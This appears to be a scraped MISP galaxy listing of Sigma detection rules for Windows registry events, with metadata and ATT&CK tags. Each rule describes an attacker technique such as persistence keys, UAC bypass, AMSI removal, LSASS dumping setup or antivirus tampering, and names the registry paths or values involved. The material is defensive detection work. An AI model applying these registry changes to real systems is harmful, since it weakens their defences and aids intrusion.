author Ilyas Ochkov, oscd.community, Tim Shelton
creation_date 2019/10/25
falsepositive ['Unknown']
filename registry_event_new_dll_added_to_appinit_dlls_registry_key.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546.010']
Related clusters

To see the related clusters, click here.

Narrator's Feedback-Hub Persistence

Detects abusing Windows 10 Narrator's Feedback-Hub

Internal MISP references

UUID f663a6d9-9d1b-49b8-b2b1-0637914d199a which can be used as unique global reference for Narrator's Feedback-Hub Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dmitriy Lifanov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename registry_event_narrator_feedback_persistance.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

OilRig APT Registry Persistence

Detects OilRig registry persistence as reported by Nyotron in their March 2018 report

Internal MISP references

UUID 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 which can be used as unique global reference for OilRig APT Registry Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
creation_date 2018/03/23
falsepositive ['Unlikely']
filename registry_event_apt_oilrig_mar18.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.g0049', 'attack.t1053.005', 'attack.s0111', 'attack.t1543.003', 'attack.defense_evasion', 'attack.t1112', 'attack.command_and_control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

Registry Entries For Azorult Malware

Detects the presence of a registry key created during Azorult execution

Internal MISP references

UUID f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7 which can be used as unique global reference for Registry Entries For Azorult Malware in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick
creation_date 2020/05/08
falsepositive ['Unknown']
filename registry_event_mal_azorult.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.execution', 'attack.t1112']
Related clusters

To see the related clusters, click here.

CMSTP Execution Registry Event

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Internal MISP references

UUID b6d235fc-1d38-4b12-adbe-325f06728f37 which can be used as unique global reference for CMSTP Execution Registry Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman
creation_date 2018/07/16
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename registry_event_cmstp_execution_by_registry.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Atbroker Registry Change

Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'

Internal MISP references

UUID 9577edbb-851f-4243-8c91-1d5b50c1a39b which can be used as unique global reference for Atbroker Registry Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mateusz Wydra, oscd.community
creation_date 2020/10/13
falsepositive ['Creation of non-default, legitimate at usage']
filename registry_event_susp_atbroker_change.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

Wdigest CredGuard Registry Modification

Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.

Internal MISP references

UUID 1a2d6c47-75b0-45bd-b133-2c0be75349fd which can be used as unique global reference for Wdigest CredGuard Registry Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019/08/25
falsepositive ['Unknown']
filename registry_event_disable_wdigest_credential_guard.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

WINEKEY Registry Modification

Detects potential malicious modification of run keys by winekey or team9 backdoor

Internal MISP references

UUID b98968aa-dbc0-4a9c-ac35-108363cbf8d5 which can be used as unique global reference for WINEKEY Registry Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020/10/30
falsepositive ['Unknown']
filename registry_event_runkey_winekey.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

HybridConnectionManager Service Installation - Registry

Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.

Internal MISP references

UUID ac8866c7-ce44-46fd-8c17-b24acff96ca8 which can be used as unique global reference for HybridConnectionManager Service Installation - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/04/12
falsepositive ['Unknown']
filename registry_event_hybridconnectionmgr_svc_installation.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.resource_development', 'attack.t1608']
Related clusters

To see the related clusters, click here.

Esentutl Volume Shadow Copy Service Keys

Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.

Internal MISP references

UUID 5aad0995-46ab-41bd-a9ff-724f41114971 which can be used as unique global reference for Esentutl Volume Shadow Copy Service Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/20
falsepositive ['Unknown']
filename registry_event_esentutl_volume_shadow_copy_service_keys.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Shell Open Registry Keys Manipulation

Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)

Internal MISP references

UUID 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 which can be used as unique global reference for Shell Open Registry Keys Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename registry_event_shell_open_keys_manipulation.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'attack.t1546.001']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Via LSASS SilentProcessExit Technique

Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process

Internal MISP references

UUID 55e29995-75e7-451a-bef0-6225e2f13597 which can be used as unique global reference for Potential Credential Dumping Via LSASS SilentProcessExit Technique in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/02/26
falsepositive ['Unlikely']
filename registry_event_silentprocessexit_lsass.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Pandemic Registry Key

Detects Pandemic Windows Implant

Internal MISP references

UUID 47e0852a-cf81-4494-a8e6-31864f8c86ed which can be used as unique global reference for Pandemic Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/06/01
falsepositive ['Unknown']
filename registry_event_apt_pandemic.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Terminal Server Client Connection History Cleared - Registry

Detects the deletion of registry keys containing the MSTSC connection history

Internal MISP references

UUID 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d which can be used as unique global reference for Terminal Server Client Connection History Cleared - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/10/19
falsepositive ['Unknown']
filename registry_delete_mstsc_history_cleared.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Removal Of SD Value to Hide Schedule Task - Registry

Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware

Internal MISP references

UUID acd74772-5f88-45c7-956b-6a7b36c294d2 which can be used as unique global reference for Removal Of SD Value to Hide Schedule Task - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2022/04/15
falsepositive ['Unknown']
filename registry_delete_schtasks_hide_task_via_sd_value_removal.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Removal Of AMSI Provider Registry Keys

Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.

Internal MISP references

UUID 41d1058a-aea7-4952-9293-29eaaf516465 which can be used as unique global reference for Removal Of AMSI Provider Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/07
falsepositive ['Unlikely']
filename registry_delete_removal_amsi_registry_key.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Folder Removed From Exploit Guard ProtectedFolders List - Registry

Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder

Internal MISP references

UUID 272e55a4-9e6b-4211-acb6-78f51f0b1b40 which can be used as unique global reference for Folder Removed From Exploit Guard ProtectedFolders List - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Legitimate administrators removing applications (should always be investigated)']
filename registry_delete_exploit_guard_protected_folders.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Removal Of Index Value to Hide Schedule Task - Registry

Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"

Internal MISP references

UUID 526cc8bc-1cdc-48ad-8b26-f19bff969cec which can be used as unique global reference for Removal Of Index Value to Hide Schedule Task - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/26
falsepositive ['Unknown']
filename registry_delete_schtasks_hide_task_via_index_value_removal.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Removal of Potential COM Hijacking Registry Keys

Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.

Internal MISP references

UUID 96f697b0-b499-4e5d-9908-a67bec11cdb6 which can be used as unique global reference for Removal of Potential COM Hijacking Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered']
filename registry_delete_removal_com_hijacking_registry_key.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Ursnif Malware Activity - Registry

Detects registry keys related to Ursnif malware.

Internal MISP references

UUID 21f17060-b282-4249-ade0-589ea3591558 which can be used as unique global reference for Potential Ursnif Malware Activity - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author megan201296
creation_date 2019/02/13
falsepositive ['Unknown']
filename registry_add_malware_ursnif.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.execution', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential COM Object Hijacking Via TreatAs Subkey - Registry

Detects COM object hijacking via TreatAs subkey

Internal MISP references

UUID 9b0f8a61-91b2-464f-aceb-0527e0a45020 which can be used as unique global reference for Potential COM Object Hijacking Via TreatAs Subkey - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kutepov Anton, oscd.community
creation_date 2019/10/23
falsepositive ['Maybe some system utilities in rare cases use linking keys for backward compatibility']
filename registry_add_persistence_com_key_linking.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Disk Cleanup Handler - Registry

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

Internal MISP references

UUID d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a which can be used as unique global reference for Potential Persistence Via Disk Cleanup Handler - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate new entry added by windows']
filename registry_add_persistence_disk_cleanup_handler_entry.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.persistence']

PUA - Sysinternal Tool Execution - Registry

Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key

Internal MISP references

UUID 25ffa65d-76d8-4da5-a832-3f2b0136e133 which can be used as unique global reference for PUA - Sysinternal Tool Execution - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2017/08/28
falsepositive ['Legitimate use of SysInternals tools', 'Programs that use the same Registry Key']
filename registry_add_pua_sysinternals_execution_via_eula.yml
level low
logsource.category registry_add
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Potential NetWire RAT Activity - Registry

Detects registry keys related to NetWire RAT

Internal MISP references

UUID 1d218616-71b0-4c40-855b-9dbe75510f7f which can be used as unique global reference for Potential NetWire RAT Activity - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock
creation_date 2021/10/07
falsepositive ['Unknown']
filename registry_add_malware_netwire.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Execution Of Renamed Sysinternals Tools - Registry

Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)

Internal MISP references

UUID f50f3c09-557d-492d-81db-9064a8d4e211 which can be used as unique global reference for Suspicious Execution Of Renamed Sysinternals Tools - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unlikely']
filename registry_add_pua_sysinternals_renamed_execution_via_eula.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Potential Persistence Via New AMSI Providers - Registry

Detects when an attacker registers a new AMSI provider in order to achieve persistence

Internal MISP references

UUID 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 which can be used as unique global reference for Potential Persistence Via New AMSI Providers - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate security products adding their own AMSI providers. Filter these according to your environment']
filename registry_add_persistence_amsi_providers.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.persistence']

Potential Persistence Via Logon Scripts - Registry

Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors

Internal MISP references

UUID 9ace0707-b560-49b8-b6ca-5148b42f39fb which can be used as unique global reference for Potential Persistence Via Logon Scripts - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure)
creation_date 2019/01/12
falsepositive ['Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate']
filename registry_add_persistence_logon_scripts_userinitmprlogonscript.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.t1037.001', 'attack.persistence', 'attack.lateral_movement']
Related clusters

To see the related clusters, click here.

PUA - Sysinternals Tools Execution - Registry

Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.

Internal MISP references

UUID c7da8edc-49ae-45a2-9e61-9fd860e4e73d which can be used as unique global reference for PUA - Sysinternals Tools Execution - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment']
filename registry_add_pua_sysinternals_susp_execution_via_eula.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Netsh Helper DLL - Registry

Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

Internal MISP references

UUID c90362e0-2df3-4e61-94fe-b37615814cb1 which can be used as unique global reference for Potential Persistence Via Netsh Helper DLL - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Anish Bogati
creation_date 2023/11/28
falsepositive ['Legitimate helper added by different programs and the OS']
filename registry_set_netsh_helper_dll_potential_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.007']
Related clusters

To see the related clusters, click here.

New DNS ServerLevelPluginDll Installed

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

Internal MISP references

UUID e61e8a88-59a9-451c-874e-70fcc9740d67 which can be used as unique global reference for New DNS ServerLevelPluginDll Installed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/08
falsepositive ['Unknown']
filename registry_set_dns_server_level_plugin_dll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Execution DLL of Choice Using WAB.EXE

This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.

Internal MISP references

UUID fc014922-5def-4da9-a0fc-28c973f41bfb which can be used as unique global reference for Execution DLL of Choice Using WAB.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/13
falsepositive ['Unknown']
filename registry_set_wab_dllpath_reg_change.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

MaxMpxCt Registry Value Changed

Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.

Internal MISP references

UUID 0e6a9e62-627e-496c-aef5-bfa39da29b5e which can be used as unique global reference for MaxMpxCt Registry Value Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/03/19
falsepositive ['Unknown']
filename registry_set_optimize_file_sharing_network.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.005']
Related clusters

To see the related clusters, click here.

Tamper With Sophos AV Registry Keys

Detects tamper attempts to sophos av functionality via registry key modification

Internal MISP references

UUID 9f4662ac-17ca-43aa-8f12-5d7b989d0101 which can be used as unique global reference for Tamper With Sophos AV Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/02
falsepositive ['Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate']
filename registry_set_sophos_av_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via App Paths Default Property

Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. First, to map an application's executable file name to that file's fully qualified path. Second, to prepend information to the PATH environment variable on a per-application, per-process basis.

Internal MISP references

UUID 707e097c-e20f-4f67-8807-1f72ff4500d6 which can be used as unique global reference for Potential Persistence Via App Paths Default Property in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/10
falsepositive ['Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)']
filename registry_set_persistence_app_paths.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.012']
Related clusters

To see the related clusters, click here.

Activate Suppression of Windows Security Center Notifications

Detect set Notification_Suppress to 1 to disable the Windows security center notification

Internal MISP references

UUID 0c93308a-3f1b-40a9-b649-57ea1a1c1d63 which can be used as unique global reference for Activate Suppression of Windows Security Center Notifications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Unknown']
filename registry_set_suppress_defender_notifications.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via CHM Helper DLL

Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence

Internal MISP references

UUID 976dd1f2-a484-45ec-aa1d-0e87e882262b which can be used as unique global reference for Potential Persistence Via CHM Helper DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unknown']
filename registry_set_persistence_chm.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

New ODBC Driver Registered

Detects the registration of a new ODBC driver.

Internal MISP references

UUID 3390fbef-c98d-4bdd-a863-d65ed7c610dd which can be used as unique global reference for New ODBC Driver Registered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/23
falsepositive ['Likely']
filename registry_set_odbc_driver_registered.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potential Persistence Using DebugPath

Detects potential persistence using Appx DebugPath

Internal MISP references

UUID df4dc653-1029-47ba-8231-3c44238cc0ae which can be used as unique global reference for Potential Persistence Using DebugPath in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/27
falsepositive ['Unknown']
filename registry_set_persistence_appx_debugger.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

Internal MISP references

UUID 7021255e-5db3-4946-a8b9-0ba7a4644a69 which can be used as unique global reference for Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/08/02
falsepositive ['Unknown']
filename registry_set_provisioning_command_abuse.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

CrashControl CrashDump Disabled

Detects disabling the CrashDump per registry (as used by HermeticWiper)

Internal MISP references

UUID 2ff692c2-4594-41ec-8fcb-46587de769e0 which can be used as unique global reference for CrashControl CrashDump Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2022/02/24
falsepositive ['Legitimate disabling of crashdumps']
filename registry_set_crashdump_disabled.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.t1564', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Outlook EnableUnsafeClientMailRules Setting Enabled - Registry

Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros

Internal MISP references

UUID 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 which can be used as unique global reference for Outlook EnableUnsafeClientMailRules Setting Enabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Unknown']
filename registry_set_office_outlook_enable_unsafe_client_mail_rules.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable UAC Using Registry

Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0

Internal MISP references

UUID 48437c39-9e5f-47fb-af95-3d663c3f2919 which can be used as unique global reference for Disable UAC Using Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/05
falsepositive ['Unknown']
filename registry_set_disable_uac_registry.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Registry Explorer Policy Modification

Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)

Internal MISP references

UUID 1c3121ed-041b-4d97-a075-07f54f20fb4a which can be used as unique global reference for Registry Explorer Policy Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/18
falsepositive ['Legitimate admin script']
filename registry_set_set_nopolicies_user.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential PendingFileRenameOperations Tamper

Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.

Internal MISP references

UUID 4eec988f-7bf0-49f1-8675-1e6a510b3a2a which can be used as unique global reference for Potential PendingFileRenameOperations Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/27
falsepositive ['Installers and updaters may set currently in use files for rename after a reboot.']
filename registry_set_susp_pendingfilerenameoperations.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Potential Attachment Manager Settings Associations Tamper

Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)

Internal MISP references

UUID a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47 which can be used as unique global reference for Potential Attachment Manager Settings Associations Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unlikely']
filename registry_set_policies_associations_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

CurrentVersion NT Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID cbf93e5d-ca6c-4722-8bea-e9119007c248 which can be used as unique global reference for CurrentVersion NT Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_currentversion_nt.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

RDP Sensitive Settings Changed to Zero

Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.

Internal MISP references

UUID a2863fbc-d5cb-48d5-83fb-d976d4b1743b which can be used as unique global reference for RDP Sensitive Settings Changed to Zero in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
creation_date 2022/09/29
falsepositive ['Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)']
filename registry_set_terminal_server_suspicious.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Scripted Diagnostics Turn Off Check Enabled - Registry

Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability

Internal MISP references

UUID 7d995e63-ec83-4aa3-89d5-8a17b5c87c86 which can be used as unique global reference for Scripted Diagnostics Turn Off Check Enabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2022/06/15
